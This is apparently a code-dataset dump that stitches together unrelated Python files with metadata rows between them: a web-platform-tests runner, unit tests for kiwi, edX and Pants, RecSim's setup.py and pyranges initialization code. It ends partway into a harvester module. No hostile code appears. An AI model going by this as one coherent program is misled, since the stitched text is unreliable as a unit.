elif resp == "n":
return False
def install(self, venv):
if self.prompt_install(self.name):
return self.browser.install(venv.path)
def setup(self, kwargs):
self.venv.install_requirements(os.path.join(wpt_root, "tools", "wptrunner", self.browser.requirements))
self.setup_kwargs(kwargs)
class Firefox(BrowserSetup):
name = "firefox"
browser_cls = browser.Firefox
def setup_kwargs(self, kwargs):
if kwargs["binary"] is None:
binary = self.browser.find_binary()
if binary is None:
raise WptrunError("""Firefox binary not found on $PATH.
Install Firefox or use --binary to set the binary path""")
kwargs["binary"] = binary
if kwargs["certutil_binary"] is None and kwargs["ssl_type"] != "none":
certutil = self.browser.find_certutil()
if certutil is None:
# Can't download this for now because it's missing the libnss3 library
raise WptrunError("""Can't find certutil.
This must be installed using your OS package manager or directly e.g.
Debian/Ubuntu:
sudo apt install libnss3-tools
macOS/Homebrew:
brew install nss
Others:
Download the firefox archive and common.tests.zip archive for your platform
from https://archive.mozilla.org/pub/firefox/nightly/latest-mozilla-central/
Then extract certutil[.exe] from the tests.zip package and
libnss3[.so|.dll|.dylib], and put the former on your PATH and the latter on
your library path.
""")
else:
print("Using certutil %s" % certutil)
if certutil is not None:
kwargs["certutil_binary"] = certutil
else:
print("Unable to find or install certutil, setting ssl-type to none")
kwargs["ssl_type"] = "none"
if kwargs["webdriver_binary"] is None and "wdspec" in kwargs["test_types"]:
webdriver_binary = self.browser.find_webdriver()
if webdriver_binary is None:
install = self.prompt_install("geckodriver")
if install:
print("Downloading geckodriver")
webdriver_binary = self.browser.install_webdriver(dest=self.venv.bin_path)
else:
print("Using webdriver binary %s" % webdriver_binary)
if webdriver_binary:
kwargs["webdriver_binary"] = webdriver_binary
else:
print("Unable to find or install geckodriver, skipping wdspec tests")
kwargs["test_types"].remove("wdspec")
if kwargs["prefs_root"] is None:
print("Downloading gecko prefs")
prefs_root = self.browser.install_prefs(self.venv.path)
kwargs["prefs_root"] = prefs_root
class Chrome(BrowserSetup):
name = "chrome"
browser_cls = browser.Chrome
def setup_kwargs(self, kwargs):
if kwargs["webdriver_binary"] is None:
webdriver_binary = self.browser.find_webdriver()
if webdriver_binary is None:
install = self.prompt_install("chromedriver")
if install:
print("Downloading chromedriver")
webdriver_binary = self.browser.install_webdriver(dest=self.venv.bin_path)
else:
print("Using webdriver binary %s" % webdriver_binary)
if webdriver_binary:
kwargs["webdriver_binary"] = webdriver_binary
else:
raise WptrunError("Unable to locate or install chromedriver binary")
class Edge(BrowserSetup):
name = "edge"
browser_cls = browser.Edge
def install(self, venv):
raise NotImplementedError
def setup_kwargs(self, kwargs):
if kwargs["webdriver_binary"] is None:
webdriver_binary = self.browser.find_webdriver()
if webdriver_binary is None:
raise WptrunError("""Unable to find WebDriver and we aren't yet clever enough to work out which
version to download. Please go to the following URL and install the correct
version for your Edge/Windows release somewhere on the %PATH%:
https://developer.microsoft.com/en-us/microsoft-edge/tools/webdriver/
""")
kwargs["webdriver_binary"] = webdriver_binary
class InternetExplorer(BrowserSetup):
name = "ie"
browser_cls = browser.InternetExplorer
def install(self, venv):
raise NotImplementedError
def setup_kwargs(self, kwargs):
if kwargs["webdriver_binary"] is None:
webdriver_binary = self.browser.find_webdriver()
if webdriver_binary is None:
raise WptrunError("""Unable to find WebDriver and we aren't yet clever enough to work out which
version to download. Please go to the following URL and install the driver for Internet Explorer
somewhere on the %PATH%:
https://selenium-release.storage.googleapis.com/index.html
""")
kwargs["webdriver_binary"] = webdriver_binary
class Sauce(BrowserSetup):
name = "sauce"
browser_cls = browser.Sauce
def install(self, venv):
raise NotImplementedError
def setup_kwargs(self, kwargs):
kwargs.set_if_none("sauce_browser", self.sub_product[0])
kwargs.set_if_none("sauce_version", self.sub_product[1])
kwargs["test_types"] = ["testharness", "reftest"]
class Servo(BrowserSetup):
name = "servo"
browser_cls = browser.Servo
def install(self, venv):
raise NotImplementedError
def setup_kwargs(self, kwargs):
if kwargs["binary"] is None:
binary = self.browser.find_binary()
if binary is None:
raise WptrunError("Unable to find servo binary on the PATH")
kwargs["binary"] = binary
product_setup = {
"firefox": Firefox,
"chrome": Chrome,
"edge": Edge,
"ie": InternetExplorer,
"servo": Servo,
"sauce": Sauce,
}
def setup_wptrunner(venv, prompt=True, install=False, **kwargs):
from wptrunner import wptrunner, wptcommandline
global logger
kwargs = utils.Kwargs(kwargs.iteritems())
product_parts = kwargs["product"].split(":")
kwargs["product"] = product_parts[0]
sub_product = product_parts[1:]
wptrunner.setup_logging(kwargs, {"mach": sys.stdout})
logger = wptrunner.logger
check_environ(kwargs["product"])
args_general(kwargs)
if kwargs["product"] not in product_setup:
raise WptrunError("Unsupported product %s" % kwargs["product"])
setup_cls = product_setup[kwargs["product"]](venv, prompt, sub_product)
if install:
logger.info("Installing browser")
kwargs["binary"] = setup_cls.install(venv)
setup_cls.setup(kwargs)
wptcommandline.check_args(kwargs)
wptrunner_path = os.path.join(wpt_root, "tools", "wptrunner")
venv.install_requirements(os.path.join(wptrunner_path, "requirements.txt"))
return kwargs
def run(venv, **kwargs):
    # Remove arguments that aren't passed to wptrunner
prompt = kwargs.pop("prompt", True)
stability = kwargs.pop("stability", True)
install_browser = kwargs.pop("install_browser", False)
kwargs = setup_wptrunner(venv,
prompt=prompt,
install=install_browser,
**kwargs)
if stability:
import stability
iterations, results, inconsistent = stability.run(venv, logger, **kwargs)
def log(x):
print(x)
if inconsistent:
stability.write_inconsistent(log, inconsistent, iterations)
else:
log("All tests stable")
rv = len(inconsistent) > 0
else:
rv = run_single(venv, **kwargs) > 0
return rv
def run_single(venv, **kwargs):
from wptrunner import wptrunner
return wptrunner.start(**kwargs)
def main():
try:
parser = create_parser()
args = parser.parse_args()
venv = virtualenv.Virtualenv(os.path.join(wpt_root, "_venv_%s") % platform.uname()[0])
venv.start()
venv.install_requirements(os.path.join(wpt_root, "tools", "wptrunner", "requirements.txt"))
venv.install("requests")
        return run(venv, **vars(args))
except WptrunError as e:
exit(e.message)
if __name__ == "__main__":
import pdb
from tools import localpaths
try:
main()
except:
pdb.post_mortem()
| mpl-2.0 | -1,231,535,169,148,979,200 | 31.338902 | 113 | 0.605387 | false | 4.006505 | true | false | false |
b1-systems/kiwi | test/unit/container_image_docker_test.py | 1 | 1827 | from mock import (
call, patch, Mock
)
from kiwi.container.docker import ContainerImageDocker
class TestContainerImageDocker(object):
@patch('kiwi.container.docker.Compress')
@patch('kiwi.container.docker.Command.run')
@patch('kiwi.container.oci.RuntimeConfig')
@patch('kiwi.container.oci.OCI')
def test_pack_image_to_file(
self, mock_OCI, mock_RuntimeConfig, mock_command, mock_compress
):
oci = Mock()
oci.container_name = 'kiwi_oci_dir.XXXX/oci_layout:latest'
mock_OCI.return_value = oci
compressor = Mock()
compressor.xz = Mock(
return_value='result.tar.xz'
)
mock_compress.return_value = compressor
docker = ContainerImageDocker(
'root_dir', {
'container_name': 'foo/bar',
'additional_tags': ['current', 'foobar']
}
)
docker.runtime_config.get_container_compression = Mock(
return_value='xz'
)
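        # With xz compression configured, packing should compress the archive
        # and return the .tar.xz file name.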
assert docker.pack_image_to_file('result.tar') == 'result.tar.xz'
assert mock_command.call_args_list == [
call(['rm', '-r', '-f', 'result.tar']),
call([
'skopeo', 'copy', 'oci:kiwi_oci_dir.XXXX/oci_layout:latest',
'docker-archive:result.tar:foo/bar:latest',
'--additional-tag', 'foo/bar:current',
'--additional-tag', 'foo/bar:foobar'
])
]
mock_compress.assert_called_once_with('result.tar')
compressor.xz.assert_called_once_with(
docker.runtime_config.get_xz_options.return_value
)
docker.runtime_config.get_container_compression = Mock(
return_value=None
)
assert docker.pack_image_to_file('result.tar') == 'result.tar'
| gpl-3.0 | -8,185,668,525,592,596,000 | 32.833333 | 76 | 0.574165 | false | 3.683468 | false | false | false |
UQ-UQx/edx-platform_lti | lms/djangoapps/courseware/tests/test_masquerade.py | 1 | 4291 | """
Unit tests for masquerade
Based on (and depends on) unit tests for courseware.
Notes for running by hand:
./manage.py lms --settings test test lms/djangoapps/courseware
"""
import json
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from courseware.tests.factories import StaffFactory
from courseware.tests.helpers import LoginEnrollmentTestCase
from lms.djangoapps.lms_xblock.runtime import quote_slashes
from xmodule.modulestore.django import modulestore, clear_existing_modulestores
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.django_utils import TEST_DATA_MIXED_GRADED_MODULESTORE
# TODO: the "abtest" node in the sample course "graded" is currently preventing
# it from being successfully loaded in the mongo modulestore.
# Fix this testcase class to not depend on that course, and let it use
# the mocked modulestore instead of the XML.
@override_settings(MODULESTORE=TEST_DATA_MIXED_GRADED_MODULESTORE)
class TestStaffMasqueradeAsStudent(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Check for staff being able to masquerade as student.
"""
def setUp(self):
# Clear out the modulestores, causing them to reload
clear_existing_modulestores()
self.graded_course = modulestore().get_course(SlashSeparatedCourseKey("edX", "graded", "2012_Fall"))
# Create staff account
self.staff = StaffFactory(course_key=self.graded_course.id)
self.logout()
# self.staff.password is the sha hash but login takes the plain text
self.login(self.staff.email, 'test')
self.enroll(self.graded_course)
def get_cw_section(self):
url = reverse('courseware_section',
kwargs={'course_id': self.graded_course.id.to_deprecated_string(),
'chapter': 'GradedChapter',
'section': 'Homework1'})
resp = self.client.get(url)
print "url ", url
return resp
def test_staff_debug_for_staff(self):
resp = self.get_cw_section()
sdebug = 'Staff Debug Info'
print resp.content
self.assertTrue(sdebug in resp.content)
def toggle_masquerade(self):
"""
Toggle masquerade state.
"""
masq_url = reverse('masquerade-switch', kwargs={'marg': 'toggle'})
print "masq_url ", masq_url
resp = self.client.get(masq_url)
return resp
def test_no_staff_debug_for_student(self):
togresp = self.toggle_masquerade()
print "masq now ", togresp.content
        self.assertEqual(togresp.content, '{"status": "student"}')
resp = self.get_cw_section()
sdebug = 'Staff Debug Info'
self.assertFalse(sdebug in resp.content)
def get_problem(self):
pun = 'H1P1'
problem_location = self.graded_course.id.make_usage_key("problem", pun)
modx_url = reverse('xblock_handler',
kwargs={'course_id': self.graded_course.id.to_deprecated_string(),
'usage_id': quote_slashes(problem_location.to_deprecated_string()),
'handler': 'xmodule_handler',
'suffix': 'problem_get'})
resp = self.client.get(modx_url)
print "modx_url ", modx_url
return resp
def test_showanswer_for_staff(self):
resp = self.get_problem()
html = json.loads(resp.content)['html']
print html
sabut = '<button class="show"><span class="show-label">Show Answer</span> <span class="sr">Reveal Answer</span></button>'
self.assertTrue(sabut in html)
def test_no_showanswer_for_student(self):
togresp = self.toggle_masquerade()
print "masq now ", togresp.content
        self.assertEqual(togresp.content, '{"status": "student"}')
resp = self.get_problem()
html = json.loads(resp.content)['html']
sabut = '<button class="show"><span class="show-label" aria-hidden="true">Show Answer</span> <span class="sr">Reveal answer above</span></button>'
self.assertFalse(sabut in html)
| agpl-3.0 | -9,220,477,234,079,998,000 | 36.973451 | 154 | 0.648567 | false | 4.021556 | true | false | false |
google-research/recsim | setup.py | 1 | 2855 | # coding=utf-8
# Copyright 2019 The RecSim Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Setup script for RecSim.
This script will install RecSim as a Python module.
See: https://github.com/google-research/recsim
"""
from os import path
from setuptools import find_packages
from setuptools import setup
here = path.abspath(path.dirname(__file__))
install_requires = [
'absl-py',
'dopamine-rl >= 2.0.5',
'gin-config',
'gym',
'numpy',
'scipy',
'tensorflow',
]
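# Assumed local workflow: `pip install -e .` from the repo root installs the
# package together with the requirements listed above.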
recsim_description = (
'RecSim: A Configurable Recommender Systems Simulation Platform')
with open('README.md', 'r') as fh:
long_description = fh.read()
setup(
name='recsim',
version='0.2.4',
author='The RecSim Team',
author_email='[email protected]',
description=recsim_description,
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/google-research/recsim',
packages=find_packages(exclude=['docs']),
classifiers=[ # Optional
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
# Pick your license as you wish
'License :: OSI Approved :: Apache Software License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
],
install_requires=install_requires,
project_urls={ # Optional
'Documentation': 'https://github.com/google-research/recsim',
'Bug Reports': 'https://github.com/google-research/recsim/issues',
'Source': 'https://github.com/google-research/recsim',
},
license='Apache 2.0',
keywords='recsim reinforcement-learning recommender-system simulation'
)
| apache-2.0 | 9,064,123,179,898,431,000 | 31.816092 | 77 | 0.676357 | false | 3.998599 | false | false | false |
ericzundel/pants | tests/python/pants_test/engine/legacy/test_changed_integration.py | 1 | 15510 | # coding=utf-8
# Copyright 2016 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
import shutil
import subprocess
from contextlib import contextmanager
from textwrap import dedent
from pants.base.build_environment import get_buildroot
from pants.util.contextutil import environment_as, temporary_dir
from pants.util.dirutil import safe_mkdir, safe_open, touch
from pants_test.base_test import TestGenerator
from pants_test.pants_run_integration_test import PantsRunIntegrationTest, ensure_engine
from pants_test.testutils.git_util import initialize_repo
def lines_to_set(str_or_list):
if isinstance(str_or_list, list):
return set(str_or_list)
else:
return set(x for x in str(str_or_list).split('\n') if x)
@contextmanager
def mutated_working_copy(files_to_mutate, to_append='\n '):
"""Given a list of files, append whitespace to each of them to trigger a git diff - then reset."""
assert to_append, 'to_append may not be empty'
for f in files_to_mutate:
with open(f, 'ab') as fh:
fh.write(to_append)
try:
yield
finally:
seek_point = len(to_append) * -1
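    # Rewind by exactly the appended suffix and truncate, restoring each
    # file to its original byte content.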
for f in files_to_mutate:
with open(f, 'ab') as fh:
fh.seek(seek_point, os.SEEK_END)
fh.truncate()
@contextmanager
def create_isolated_git_repo():
# Isolated Git Repo Structure:
# worktree
# |--README
# |--pants.ini
# |--3rdparty
# |--BUILD
# |--src
# |--resources
# |--org/pantsbuild/resourceonly
# |--BUILD
# |--README.md
# |--java
# |--org/pantsbuild/helloworld
# |--BUILD
# |--helloworld.java
# |--python
# |--python_targets
# |--BUILD
# |--test_binary.py
# |--test_library.py
# |--test_unclaimed_src.py
# |--sources
# |--BUILD
# |--sources.py
# |--sources.txt
# |--tests
# |--scala
# |--org/pantsbuild/cp-directories
# |--BUILD
# |--ClasspathDirectoriesSpec.scala
with temporary_dir(root_dir=get_buildroot()) as worktree:
with safe_open(os.path.join(worktree, 'README'), 'w') as fp:
fp.write('Just a test tree.')
# Create an empty pants config file.
touch(os.path.join(worktree, 'pants.ini'))
# Copy .gitignore to new repo.
shutil.copyfile('.gitignore', os.path.join(worktree, '.gitignore'))
with initialize_repo(worktree=worktree, gitdir=os.path.join(worktree, '.git')) as git:
# Resource File
resource_file = os.path.join(worktree, 'src/resources/org/pantsbuild/resourceonly/README.md')
with safe_open(resource_file, 'w') as fp:
fp.write('Just resource.')
resource_build_file = os.path.join(worktree, 'src/resources/org/pantsbuild/resourceonly/BUILD')
with safe_open(resource_build_file, 'w') as fp:
fp.write(dedent("""
resources(
name='resource',
sources=['README.md'],
)
"""))
git.add(resource_file, resource_build_file)
git.commit('Check in a resource target.')
# Java Program
src_file = os.path.join(worktree, 'src/java/org/pantsbuild/helloworld/helloworld.java')
with safe_open(src_file, 'w') as fp:
fp.write(dedent("""
package org.pantsbuild.helloworld;
class HelloWorld {
public static void main(String[] args) {
System.out.println("Hello, World!\n");
}
}
"""))
src_build_file = os.path.join(worktree, 'src/java/org/pantsbuild/helloworld/BUILD')
with safe_open(src_build_file, 'w') as fp:
fp.write(dedent("""
jvm_binary(
dependencies=[
'{}',
],
source='helloworld.java',
main='org.pantsbuild.helloworld.HelloWorld',
)
""".format('src/resources/org/pantsbuild/resourceonly:resource')))
git.add(src_file, src_build_file)
git.commit('hello world java program with a dependency on a resource file.')
# Scala Program
scala_src_dir = os.path.join(worktree, 'tests/scala/org/pantsbuild/cp-directories')
safe_mkdir(os.path.dirname(scala_src_dir))
shutil.copytree('testprojects/tests/scala/org/pantsbuild/testproject/cp-directories', scala_src_dir)
git.add(scala_src_dir)
git.commit('Check in a scala test target.')
# Python library and binary
python_src_dir = os.path.join(worktree, 'src/python/python_targets')
safe_mkdir(os.path.dirname(python_src_dir))
shutil.copytree('testprojects/src/python/python_targets', python_src_dir)
git.add(python_src_dir)
git.commit('Check in python targets.')
# A `python_library` with `resources=['file.name']`.
python_src_dir = os.path.join(worktree, 'src/python/sources')
safe_mkdir(os.path.dirname(python_src_dir))
shutil.copytree('testprojects/src/python/sources', python_src_dir)
git.add(python_src_dir)
git.commit('Check in a python library with resource dependency.')
# Copy 3rdparty/BUILD.
_3rdparty_build = os.path.join(worktree, '3rdparty/BUILD')
safe_mkdir(os.path.dirname(_3rdparty_build))
shutil.copyfile('3rdparty/BUILD', _3rdparty_build)
git.add(_3rdparty_build)
git.commit('Check in 3rdparty/BUILD.')
with environment_as(PANTS_BUILDROOT_OVERRIDE=worktree):
yield worktree
class ChangedIntegrationTest(PantsRunIntegrationTest, TestGenerator):
TEST_MAPPING = {
# A `jvm_binary` with `source='file.name'`.
'src/java/org/pantsbuild/helloworld/helloworld.java': dict(
none=['src/java/org/pantsbuild/helloworld:helloworld'],
direct=['src/java/org/pantsbuild/helloworld:helloworld'],
transitive=['src/java/org/pantsbuild/helloworld:helloworld']
),
# A `python_binary` with `source='file.name'`.
'src/python/python_targets/test_binary.py': dict(
none=['src/python/python_targets:test'],
direct=['src/python/python_targets:test'],
transitive=['src/python/python_targets:test']
),
# A `python_library` with `sources=['file.name']`.
'src/python/python_targets/test_library.py': dict(
none=['src/python/python_targets:test_library'],
direct=['src/python/python_targets:test',
'src/python/python_targets:test_library',
'src/python/python_targets:test_library_direct_dependee'],
transitive=['src/python/python_targets:test',
'src/python/python_targets:test_library',
'src/python/python_targets:test_library_direct_dependee',
'src/python/python_targets:test_library_transitive_dependee',
'src/python/python_targets:test_library_transitive_dependee_2',
'src/python/python_targets:test_library_transitive_dependee_3',
'src/python/python_targets:test_library_transitive_dependee_4']
),
# A `resources` target with `sources=['file.name']` referenced by a `java_library` target.
'src/resources/org/pantsbuild/resourceonly/README.md': dict(
none=['src/resources/org/pantsbuild/resourceonly:resource'],
direct=['src/java/org/pantsbuild/helloworld:helloworld',
'src/resources/org/pantsbuild/resourceonly:resource'],
transitive=['src/java/org/pantsbuild/helloworld:helloworld',
'src/resources/org/pantsbuild/resourceonly:resource'],
),
# A `python_library` with `resources=['file.name']`.
'src/python/sources/sources.txt': dict(
none=['src/python/sources:sources'],
direct=['src/python/sources:sources'],
transitive=['src/python/sources:sources']
),
# A `scala_library` with `sources=['file.name']`.
'tests/scala/org/pantsbuild/cp-directories/ClasspathDirectoriesSpec.scala': dict(
none=['tests/scala/org/pantsbuild/cp-directories:cp-directories'],
direct=['tests/scala/org/pantsbuild/cp-directories:cp-directories'],
transitive=['tests/scala/org/pantsbuild/cp-directories:cp-directories']
),
# An unclaimed source file.
'src/python/python_targets/test_unclaimed_src.py': dict(
none=[],
direct=[],
transitive=[]
)
}
@classmethod
def generate_tests(cls):
"""Generates tests on the class for better reporting granularity than an opaque for loop test."""
def safe_filename(f):
return f.replace('/', '_').replace('.', '_')
for filename, dependee_mapping in cls.TEST_MAPPING.items():
for dependee_type in dependee_mapping.keys():
# N.B. The parameters here are used purely to close over the respective loop variables.
def inner_integration_coverage_test(self, filename=filename, dependee_type=dependee_type):
with create_isolated_git_repo() as worktree:
# Mutate the working copy so we can do `--changed-parent=HEAD` deterministically.
with mutated_working_copy([os.path.join(worktree, filename)]):
stdout = self.assert_changed_new_equals_old(
['--changed-include-dependees={}'.format(dependee_type), '--changed-parent=HEAD'],
test_list=True
)
self.assertEqual(
lines_to_set(self.TEST_MAPPING[filename][dependee_type]),
lines_to_set(stdout)
)
cls.add_test(
'test_changed_coverage_{}_{}'.format(dependee_type, safe_filename(filename)),
inner_integration_coverage_test
)
def assert_changed_new_equals_old(self, extra_args, success=True, test_list=False):
args = ['-q', 'changed'] + extra_args
changed_run = self.do_command(*args, success=success, enable_v2_engine=False)
engine_changed_run = self.do_command(*args, success=success, enable_v2_engine=True)
self.assertEqual(
lines_to_set(changed_run.stdout_data), lines_to_set(engine_changed_run.stdout_data)
)
if test_list:
# In the v2 engine, `--changed-*` options can alter the specs of any goal - test with `list`.
list_args = ['-q', 'list'] + extra_args
engine_list_run = self.do_command(*list_args, success=success, enable_v2_engine=True)
self.assertEqual(
lines_to_set(changed_run.stdout_data), lines_to_set(engine_list_run.stdout_data)
)
    # If we get here without an assertion failure, all copies of stdout are
    # identical - return one.
return changed_run.stdout_data
@ensure_engine
def test_changed_options_scope_shadowing(self):
"""Tests that the `test-changed` scope overrides `changed` scope."""
changed_src = 'src/python/python_targets/test_library.py'
expected_target = self.TEST_MAPPING[changed_src]['none'][0]
expected_set = {expected_target}
not_expected_set = set(self.TEST_MAPPING[changed_src]['transitive']).difference(expected_set)
with create_isolated_git_repo() as worktree:
with mutated_working_copy([os.path.join(worktree, changed_src)]):
pants_run = self.run_pants([
'-ldebug', # This ensures the changed target name shows up in the pants output.
'test-changed',
'--test-changed-changes-since=HEAD',
'--test-changed-include-dependees=none', # This option should be used.
'--changed-include-dependees=transitive' # This option should be stomped on.
])
self.assert_success(pants_run)
for expected_item in expected_set:
self.assertIn(expected_item, pants_run.stdout_data)
for not_expected_item in not_expected_set:
if expected_target.startswith(not_expected_item):
continue # Ignore subset matches.
self.assertNotIn(not_expected_item, pants_run.stdout_data)
@ensure_engine
def test_changed_options_scope_positional(self):
changed_src = 'src/python/python_targets/test_library.py'
expected_set = set(self.TEST_MAPPING[changed_src]['transitive'])
with create_isolated_git_repo() as worktree:
with mutated_working_copy([os.path.join(worktree, changed_src)]):
pants_run = self.run_pants([
'-ldebug', # This ensures the changed target names show up in the pants output.
'test-changed',
'--changes-since=HEAD',
'--include-dependees=transitive'
])
self.assert_success(pants_run)
for expected_item in expected_set:
self.assertIn(expected_item, pants_run.stdout_data)
@ensure_engine
def test_test_changed_exclude_target(self):
changed_src = 'src/python/python_targets/test_library.py'
exclude_target_regexp = r'_[0-9]'
excluded_set = {'src/python/python_targets:test_library_transitive_dependee_2',
'src/python/python_targets:test_library_transitive_dependee_3',
'src/python/python_targets:test_library_transitive_dependee_4'}
expected_set = set(self.TEST_MAPPING[changed_src]['transitive']) - excluded_set
with create_isolated_git_repo() as worktree:
with mutated_working_copy([os.path.join(worktree, changed_src)]):
pants_run = self.run_pants([
'-ldebug', # This ensures the changed target names show up in the pants output.
'--exclude-target-regexp={}'.format(exclude_target_regexp),
'test-changed',
'--changes-since=HEAD',
'--include-dependees=transitive'
])
self.assert_success(pants_run)
for expected_item in expected_set:
self.assertIn(expected_item, pants_run.stdout_data)
for excluded_item in excluded_set:
self.assertNotIn(excluded_item, pants_run.stdout_data)
@ensure_engine
def test_changed_changed_since_and_files(self):
with create_isolated_git_repo():
stdout = self.assert_changed_new_equals_old(['--changed-since=HEAD^^', '--files'])
# The output should be the files added in the last 2 commits.
self.assertEqual(
lines_to_set(stdout),
{'src/python/sources/BUILD',
'src/python/sources/sources.py',
'src/python/sources/sources.txt',
'3rdparty/BUILD'}
)
@ensure_engine
def test_changed_diffspec_and_files(self):
with create_isolated_git_repo():
git_sha = subprocess.check_output(['git', 'rev-parse', 'HEAD^^']).strip()
stdout = self.assert_changed_new_equals_old(['--changed-diffspec={}'.format(git_sha), '--files'])
# The output should be the files added in the last 2 commits.
self.assertEqual(
lines_to_set(stdout),
{'src/python/python_targets/BUILD',
'src/python/python_targets/test_binary.py',
'src/python/python_targets/test_library.py',
'src/python/python_targets/test_unclaimed_src.py'}
)
# Following 4 tests do not run in isolated repo because they don't mutate working copy.
def test_changed(self):
self.assert_changed_new_equals_old([])
def test_changed_with_changes_since(self):
self.assert_changed_new_equals_old(['--changes-since=HEAD^^'])
def test_changed_with_changes_since_direct(self):
self.assert_changed_new_equals_old(['--changes-since=HEAD^^', '--include-dependees=direct'])
def test_changed_with_changes_since_transitive(self):
self.assert_changed_new_equals_old(['--changes-since=HEAD^^', '--include-dependees=transitive'])
ChangedIntegrationTest.generate_tests()
| apache-2.0 | -7,091,702,238,887,517,000 | 39.181347 | 106 | 0.648227 | false | 3.567157 | true | false | false |
biocore-ntnu/pyranges | pyranges/methods/init.py | 1 | 5712 | import sys
import numpy as np
import pandas as pd
from natsort import natsorted
from pyranges.statistics import StatisticsMethods
from pyranges.genomicfeatures import GenomicFeaturesMethods
from pyranges import PyRanges
from pyranges.helpers import single_value_key, get_key_from_df
def set_dtypes(df, int64):
# if extended is None:
# extended = False if df.Start.dtype == np.int32 else True
if not int64:
dtypes = {
"Start": np.int32,
"End": np.int32,
"Chromosome": "category",
"Strand": "category",
}
else:
dtypes = {
"Start": np.int64,
"End": np.int64,
"Chromosome": "category",
"Strand": "category",
}
if "Strand" not in df:
del dtypes["Strand"]
# need to ascertain that object columns do not consist of multiple types
# https://github.com/biocore-ntnu/epic2/issues/32
for column in "Chromosome Strand".split():
if column not in df:
continue
df[column] = df[column].astype(str)
for col, dtype in dtypes.items():
if df[col].dtype.name != dtype:
df[col] = df[col].astype(dtype)
return df
def create_df_dict(df, stranded):
chrs = df.Chromosome.cat.remove_unused_categories()
df["Chromosome"] = chrs
if stranded:
grpby_key = "Chromosome Strand".split()
df["Strand"] = df.Strand.cat.remove_unused_categories()
else:
grpby_key = "Chromosome"
return {k: v for k, v in df.groupby(grpby_key)}
def create_pyranges_df(chromosomes, starts, ends, strands=None):
if isinstance(chromosomes, str) or isinstance(chromosomes, int):
chromosomes = pd.Series([chromosomes] * len(starts), dtype="category")
if strands is not None:
if isinstance(strands, str):
strands = pd.Series([strands] * len(starts), dtype="category")
columns = [chromosomes, starts, ends, strands]
lengths = list(str(len(s)) for s in columns)
assert (
len(set(lengths)) == 1
), "chromosomes, starts, ends and strands must be of equal length. But are {}".format(
", ".join(lengths)
)
colnames = "Chromosome Start End Strand".split()
else:
columns = [chromosomes, starts, ends]
lengths = list(str(len(s)) for s in columns)
assert (
len(set(lengths)) == 1
), "chromosomes, starts and ends must be of equal length. But are {}".format(
", ".join(lengths)
)
colnames = "Chromosome Start End".split()
idx = range(len(starts))
series_to_concat = []
for s in columns:
if isinstance(s, pd.Series):
s = pd.Series(s.values, index=idx)
else:
s = pd.Series(s, index=idx)
series_to_concat.append(s)
df = pd.concat(series_to_concat, axis=1)
df.columns = colnames
return df
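# Hypothetical usage sketch:
#   create_pyranges_df("chr1", [0, 100], [10, 150], strands="+")
# yields a DataFrame with equal-length Chromosome/Start/End/Strand columns.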
def check_strandedness(df):
"""Check whether strand contains '.'"""
if "Strand" not in df:
return False
contains_more_than_plus_minus_in_strand_col = False
if str(df.Strand.dtype) == "category" and (
set(df.Strand.cat.categories) - set("+-")
):
contains_more_than_plus_minus_in_strand_col = True
elif not ((df.Strand == "+") | (df.Strand == "-")).all():
contains_more_than_plus_minus_in_strand_col = True
# if contains_more_than_plus_minus_in_strand_col:
# logging.warning("Strand contained more symbols than '+' or '-'. Not supported (yet) in PyRanges.")
return not contains_more_than_plus_minus_in_strand_col
def _init(
self,
df=None,
chromosomes=None,
starts=None,
ends=None,
strands=None,
int64=False,
copy_df=True,
):
# TODO: add categorize argument with dict of args to categorize?
if isinstance(df, PyRanges):
raise Exception("Object is already a PyRange.")
if isinstance(df, pd.DataFrame):
assert all(
c in df for c in "Chromosome Start End".split()
), "The dataframe does not have all the columns Chromosome, Start and End."
if copy_df:
df = df.copy()
if df is False or df is None:
df = create_pyranges_df(chromosomes, starts, ends, strands)
if isinstance(df, pd.DataFrame):
df = df.reset_index(drop=True)
stranded = check_strandedness(df)
df = set_dtypes(df, int64)
self.__dict__["dfs"] = create_df_dict(df, stranded)
# df is actually dict of dfs
else:
empty_removed = {k: v.copy() for k, v in df.items() if not v.empty}
_single_value_key = True
_key_same = True
_strand_valid = True
_has_strand = True
for key, df in empty_removed.items():
_key = get_key_from_df(df)
_single_value_key = single_value_key(df) and _single_value_key
_key_same = (_key == key) and _key_same
if isinstance(_key, tuple):
_strand_valid = _strand_valid and (_key[1] in ["+", "-"])
else:
_has_strand = False
if not all([_single_value_key, _key_same, _strand_valid]):
df = pd.concat(empty_removed.values()).reset_index(drop=True)
if _has_strand and _strand_valid:
empty_removed = df.groupby(["Chromosome", "Strand"])
else:
empty_removed = df.groupby("Chromosome")
empty_removed = {k: v for (k, v) in empty_removed}
self.__dict__["dfs"] = empty_removed
self.__dict__["features"] = GenomicFeaturesMethods(self)
self.__dict__["stats"] = StatisticsMethods(self)
| mit | -507,038,553,936,319,200 | 28.142857 | 112 | 0.582983 | false | 3.550031 | false | false | false |
erinspace/scrapi | scrapi/harvesters/iwu_commons.py | 2 | 3226 | '''
Harvester for the Digital Commons @ IWU for the SHARE project
Example API call: http://digitalcommons.iwu.edu/do/oai/?verb=ListRecords&metadataPrefix=oai_dc
'''
from __future__ import unicode_literals
from scrapi.base import OAIHarvester
